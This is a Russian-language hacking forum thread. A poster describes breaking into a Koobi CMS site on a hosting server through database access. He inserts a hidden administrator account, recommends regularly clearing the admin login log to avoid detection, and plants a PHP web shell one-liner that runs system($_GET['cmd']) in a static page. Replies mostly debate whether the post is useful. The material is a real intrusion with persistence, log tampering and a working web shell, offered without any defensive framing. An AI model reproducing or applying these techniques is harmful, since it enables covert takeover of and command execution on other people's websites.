Недавно обнаружил прикольную фичу с добавлением пользователя. В общем, у меня был доступ к базе данных, а ля phpMyAdmin, но в админку CMS проникнуть никак не получалось, поскольку админский пароль был пошифрован md5 и никак не брутился. Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами Здесь uid - уникальный порядковый номер пользователя, uname - имя пользователя, ugroup равный 1, указывает на то, что юзер - член группы админов, email используется для логина, а pass - это md5-хеш нашего пароля (в данном случае "123"). Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался. Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать. После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так {php}system($_GET['cmd']);{/php} .
А вчем суть то, то что ты умеешь составлять SQL выражения? а насчет скрытности, я Koobi CMS не видел, но могу предположить, что за отображение отвечает другая табличка или вобще там какоето кеширование происходит, скорее всего первое
Суть в том, что ты имеешь невидимого пользователя в CMS с админскими правами. Согласись, Scipio, не всегда удобно работать с базой данных напрямую...
Вобще когда что нить взламываешь очень много неудобных вещей бывает, в твоем случае все довольно удобно сложилось, плюсенги я тебе за оформление поставлю, но суть твоего поста сводится к тому:"посмотрите как я умею", имхо пользы никакой
Собственно, это хостинг был Там было очень много неудобных phpMyAdminоv и надо было как-то в админки попасть... Действительно, очень удобно получилось
